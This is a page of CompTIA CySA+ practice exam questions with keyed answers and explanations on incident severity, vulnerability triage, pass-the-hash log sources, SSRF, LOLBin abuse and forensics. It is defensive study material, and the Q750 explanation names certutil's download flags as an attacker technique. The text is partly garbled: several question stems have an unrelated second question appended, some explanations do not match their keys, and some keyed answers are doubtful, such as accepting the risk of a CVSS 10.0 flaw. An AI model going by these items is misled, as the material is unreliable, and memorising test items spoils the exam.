Why this answer

Long-term containment involves actions to prevent recurrence, such as patching, rebuilding systems, and rotating credentials.

733
MCQeasy

An incident responder is classifying an incident. The incident involves ransomware encrypting files on multiple workstations, causing significant business disruption. Which severity level should be assigned to this incident?

A.Medium
B.High
C.Informational
D.Low
AnswerB

High severity incidents cause significant disruption, like ransomware on multiple systems.

Why this answer

Ransomware affecting multiple workstations has high impact and causes critical business disruption, so it should be classified as high severity (or critical, where the organisation's scale includes that level). Among the options given, High is the appropriate level.

734
MCQmedium

A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For validation, which action should be taken before closing or downgrading the finding?

A.Give all users local admin rights
B.Mark the vulnerability as fixed
C.Documented risk acceptance with compensating controls and a migration/remediation plan
D.Remove the system from future reports
AnswerC

Unsupported systems need formal exception handling, mitigation, ownership, and an exit path.

Why this answer

When a legacy system cannot be patched due to vendor end-of-life, the vulnerability manager must formally accept the risk by documenting the risk acceptance, implementing compensating controls (e.g., network segmentation, host-based firewall rules, or application whitelisting), and creating a migration or remediation plan to eventually retire or replace the system. This aligns with the NIST SP 800-53 risk management framework and ensures auditability.

Exam trap

The CS0-003 exam often tests the misconception that 'no patch available' means the vulnerability can be closed as 'fixed' or that compensating controls alone are sufficient without formal documentation and a plan.

How to eliminate wrong answers

Option A is wrong because granting all users local admin rights would increase the attack surface and privilege escalation risk, directly violating the principle of least privilege and potentially making the system more vulnerable. Option B is wrong because marking the vulnerability as fixed when no patch has been applied is a false positive closure; vulnerabilities must be remediated, mitigated, or formally accepted, not simply closed without evidence.

735
MCQeasy

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

A.Accept the risk based on compensating controls
B.Reclassify the vulnerability as low severity
C.Immediately patch the vulnerability
D.Ignore the finding as a false positive
AnswerA

The isolation in the DMZ serves as a compensating control, reducing the likelihood of exploitation.

Why this answer

Compensating controls like network isolation can reduce the risk even if the vulnerability itself is critical.

736
MCQmedium

A vulnerability management analyst is reviewing scan results from a recent Nessus scan. The analyst notices a plugin with the output: 'The remote host is missing a security patch for CVE-2023-1234. The patch was released by the vendor on 2023-05-01.' Which phase of the vulnerability lifecycle is the analyst currently performing?

A.Prioritization
B.Remediation
C.Verification
D.Discovery
AnswerD

Discovery is the process of identifying vulnerabilities through scanning.

Why this answer

The analyst is reviewing scan results to identify vulnerabilities, which is the discovery phase of the vulnerability lifecycle.

737
Multi-Selectmedium

A SOC wants to reduce alert fatigue without missing confirmed malicious activity. Which actions are appropriate? (Choose two.)

Select 2 answers
A.Suppress alerts only with documented criteria and expiry
B.Delete noisy detections permanently without review
C.Route every alert directly to executives
D.Add enrichment such as asset criticality and threat-intel context
AnswersA, D

Time-bound suppression preserves governance.

Why this answer

Option A is correct because suppressing alerts based on documented criteria (e.g., known false-positive signatures, scheduled maintenance windows) with an expiry date ensures that the suppression is temporary and reviewed periodically. This reduces alert fatigue while maintaining visibility into potential threats, as expired suppressions automatically re-enable alerting. Without an expiry, a suppression could inadvertently hide malicious activity that later matches the same criteria.

Exam trap

The CS0-003 exam often tests the misconception that permanently deleting noisy detections is acceptable, but the trap is that this violates the principle of defense in depth by removing the ability to detect future variations of the same threat.

738
Multi-Selectmedium

During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?

Select 3 answers
A.DNS query logs
B.Sysmon Event ID 3 (network connection)
C.Domain controller authentication logs
D.Sysmon Event ID 1 (process creation)
E.Windows Security Event Log (Event ID 4624)
AnswersB, C, E

Network connections from a host to many others can indicate lateral movement.

Why this answer

Pass-the-hash involves using NTLM hashes to authenticate. Windows Event ID 4624 (successful logon) can show logon type 3 (network) with unusual source IPs. Sysmon Event ID 3 (network connection) can show outbound connections.

Authentication logs on domain controllers show NTLM authentication attempts.

739
Multi-Selectmedium

A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)

Select 3 answers
A.Windows Event ID 4776 (NTLM authentication) logs from domain controllers
B.Windows Event ID 4624 (Logon) logs from workstations
C.DNS logs from the internal DNS server
D.Firewall logs showing outbound connections
E.Authentication logs from the source machine showing logon type 3
AnswersA, B, E

Correct. These capture NTLM authentication attempts.

Why this answer

Windows Event IDs 4624 (successful logon) and 4776 (NTLM authentication) are key. Authentication logs on domain controllers also capture NTLM events.

740
MCQmedium

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the alert triage phase, which action gives the analyst the clearest next triage step?

A.Suricata or Snort in IDS mode on a monitored network tap or SPAN port
B.A vulnerability scanner run once per quarter
C.Host-based file integrity monitoring only
D.Inline IPS mode with drop rules for all signatures
AnswerA

IDS mode observes traffic and alerts on signatures while avoiding inline blocking impact.

Why this answer

Suricata or Snort in IDS mode on a monitored network tap or SPAN port is correct because it passively inspects packet payloads against signatures without affecting traffic flow, meeting the requirement to detect exploit traffic and generate alerts without blocking. IDS mode ensures no inline packet drops, while a tap or SPAN port provides full packet visibility for signature matching.

Exam trap

The CS0-003 exam often tests the distinction between IDS and IPS modes, where candidates mistakenly choose inline IPS (Option D) because they think blocking is required for security, but the question explicitly states 'without blocking traffic,' making passive IDS the correct choice.

How to eliminate wrong answers

Option B is wrong because a vulnerability scanner run once per quarter is a proactive assessment tool that does not provide real-time packet payload inspection or alert generation for exploit traffic. Option C is wrong because host-based file integrity monitoring only detects changes to files on a host, not network-based exploit traffic in packet payloads. Option D is wrong because inline IPS mode with drop rules for all signatures actively blocks traffic, which violates the requirement to generate alerts without blocking traffic.

741
MCQmedium

A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For business prioritization, which recommendation gives the best risk-based order of work?

A.Delete all audit logs to reduce liability
B.Wait for the next quarterly review
C.Restrict public access and determine whether sensitive data was accessed
D.Rotate database administrator passwords only
AnswerC

The priority is exposure containment and impact assessment.

Why this answer

Option C is correct because the immediate priority is to contain the data exposure by restricting public access to the storage bucket, then investigate whether sensitive data was actually accessed by unauthorized parties. This aligns with the vulnerability management principle of 'contain first, investigate second' and addresses the risk of data exfiltration without waiting for a scheduled review or performing unrelated actions.

Exam trap

The trap here is that candidates may choose to rotate passwords (Option D) as a generic security response, but the question specifically tests the ability to prioritize containment of the exposed resource over unrelated credential changes.

How to eliminate wrong answers

Option A is wrong because deleting audit logs destroys forensic evidence needed to determine the scope of the breach and violates compliance requirements (e.g., GDPR, PCI DSS) that mandate retention of logs for incident investigation. Option B is wrong because waiting for the next quarterly review leaves the bucket publicly accessible, allowing continued unauthorized access and potential data exfiltration, which is unacceptable for a critical finding. Option D is wrong because rotating database administrator passwords does not address the storage bucket's public read access; it is an unrelated control that does not mitigate the immediate exposure of customer exports.

742
MCQmedium

An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?

A.Lateral movement via scheduled tasks
B.Normal administrative activity
C.Memory injection attack
D.Persistence mechanism using a LOLBin
AnswerD

Correct. Scheduled tasks are a common persistence method, and svchost.exe is abused as a LOLBin.

Why this answer

The parent-child relationship is abnormal: svchost.exe should not have cmd.exe as its parent. This indicates a living off the land (LOLBin) technique using svchost.exe to execute malicious code.

743
Multi-Selectmedium

A cybersecurity analyst is reviewing the configuration of a Linux server against CIS Benchmarks. The analyst notices that several settings deviate from the recommended baseline. Which TWO of the following are most likely to be considered Level 1 CIS Benchmark recommendations?

Select 2 answers
A.Remove all unnecessary packages and services
B.Enable mandatory access control (SELinux) in enforcing mode
C.Set password expiration to 90 days
D.Disable SSH root login
E.Configure audit rules for file permission changes
AnswersC, D

Password aging is a fundamental security control with low impact.

Why this answer

CIS Level 1 recommendations are basic security settings that do not cause significant operational impact. Setting password expiration and disabling root SSH login are common Level 1 items.

744
MCQmedium

A security analyst is reviewing a DAST report from Burp Suite for a web application. The report indicates a potential Server-Side Request Forgery (SSRF) vulnerability in a feature that fetches URLs. Which of the following is the most effective mitigation?

A.Use a whitelist of allowed URLs and validate user input against it.
B.Disable the URL fetching feature entirely.
C.Increase memory limits on the server to prevent resource exhaustion.
D.Implement a Web Application Firewall (WAF) to block malicious requests.
AnswerA

Whitelisting prevents the server from making requests to arbitrary URLs.

Why this answer

SSRF can be mitigated by validating and sanitizing user input, whitelisting allowed URLs, and blocking access to internal networks.

745
Multi-Selecthard

A security analyst is investigating a potential insider threat where a user is suspected of exfiltrating sensitive data via USB drives. The analyst needs to gather evidence while preserving the chain of custody. Which THREE actions should the analyst perform? (Choose THREE.)

Select 3 answers
A.Creating a forensic image of the USB drive using a write blocker
B.Disabling the user's network account immediately
C.Interviewing the user about their activities
D.Documenting the chain of custody for the USB drive
E.Computing a hash of the original USB drive and the forensic image
AnswersA, D, E

This captures the drive data without alteration.

Why this answer

Forensically sound procedures include imaging the drive, hashing to verify integrity, and documenting the chain of custody. Disabling the account is containment, and interviewing is not part of evidence collection.

746
MCQmedium

During a vulnerability assessment, a security analyst discovers a critical vulnerability affecting a legacy application that cannot be patched due to vendor end-of-life status. Which of the following is the BEST next step?

A.Document the risk and implement compensating controls
B.Remove the legacy application from the network immediately
C.Disable the application until a patch becomes available
D.Apply a virtual patch via an intrusion prevention system
AnswerA

This aligns with the vulnerability management lifecycle: when patching is not possible, compensating controls should be implemented and documented.

Why this answer

When a patch is not available, implementing compensating controls is the best approach to mitigate risk. This may include network segmentation, access controls, or additional monitoring.

747
MCQmedium

An analyst is reviewing a suspicious executable using static analysis. Which of the following would provide information about the functions the executable imports from system libraries?

A.Import table analysis
B.PE header analysis
C.String extraction
D.YARA rule creation
AnswerA

Correct. The import table shows imported functions.

Why this answer

The import table lists DLLs and functions that the executable uses, revealing potential capabilities.

748
MCQmedium

A security analyst is reviewing a vulnerability scan report and sees a finding for a web application with a CVSS v3.1 base score of 6.1. The vector string is AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. Which OWASP Top 10 category does this vulnerability most likely belong to?

A.A03: Injection
B.A05: Security Misconfiguration
C.A06: Vulnerable and Outdated Components
D.A01: Broken Access Control
AnswerA

Cross-site scripting is a form of injection, and in OWASP Top 10 2021, it is part of A03: Injection.

Why this answer

The vector indicates reflected XSS (requires user interaction, changes scope, low confidentiality and integrity impact). Cross-site scripting was its own OWASP Top 10 category in 2017 and was folded into A03: Injection in the 2021 list, so Injection is the correct category here.

749
MCQmedium

A vulnerability management team is prioritizing remediation of several vulnerabilities. They have access to EPSS scores and the CISA KEV catalog. Which factor should they consider FIRST when deciding which vulnerability to remediate?

A.The vulnerability with the highest base CVSS score
B.The vulnerability listed in the CISA Known Exploited Vulnerabilities catalog
C.The vulnerability affecting the most critical asset
D.The vulnerability with the highest EPSS score
AnswerB

Known exploited vulnerabilities should be prioritized due to active exploitation.

Why this answer

The CISA KEV catalog contains vulnerabilities that are actively exploited in the wild. These pose immediate risk and should be addressed before others, regardless of EPSS score or other factors.

750
MCQmedium

A host alert shows certutil.exe downloading a file from an external URL, followed by execution from a user-writable directory. What should the analyst focus on? In the containment trade-off phase, which response balances containment with evidence preservation?

A.Ignore it because certutil is signed by Microsoft
B.Reinstall the browser used by the user
C.Living-off-the-land binary misuse and the downloaded file's hash, origin, and child process
D.Only check whether antivirus signatures are current
AnswerC

Certutil can be abused to download payloads; file and process context establishes whether execution is malicious.

Why this answer

Option C is correct because certutil.exe is a known living-off-the-land binary (LOLB) that attackers abuse to download payloads, bypassing application whitelisting. The analyst must focus on the downloaded file's hash (for threat intelligence), its origin URL (to assess the C2 infrastructure), and any child processes spawned (to trace the execution chain). In the containment trade-off phase, preserving these artifacts is critical for forensic analysis while isolating the host.

Exam trap

The CS0-003 exam often tests the misconception that signed Microsoft binaries are inherently safe, but the trap here is that certutil.exe is a dual-use tool—legitimate for administrators but weaponized by attackers for LOLB attacks.

How to eliminate wrong answers

Option A is wrong because certutil being signed by Microsoft does not make it safe; attackers abuse its legitimate functionality (e.g., -urlcache -split -f) to download malicious files, a classic LOLB technique. Option B is wrong because reinstalling the browser does not address the root cause—the misuse of a system binary—and destroys evidence of the download and execution chain. Option D is wrong because antivirus signatures are reactive and may miss fileless or obfuscated payloads; the analyst must investigate the downloaded file's hash and behavior, not just signature currency.

CompTIA CySA+ CS0-003 CS0-003 Questions 676–750 | Page 10/14 | Courseiva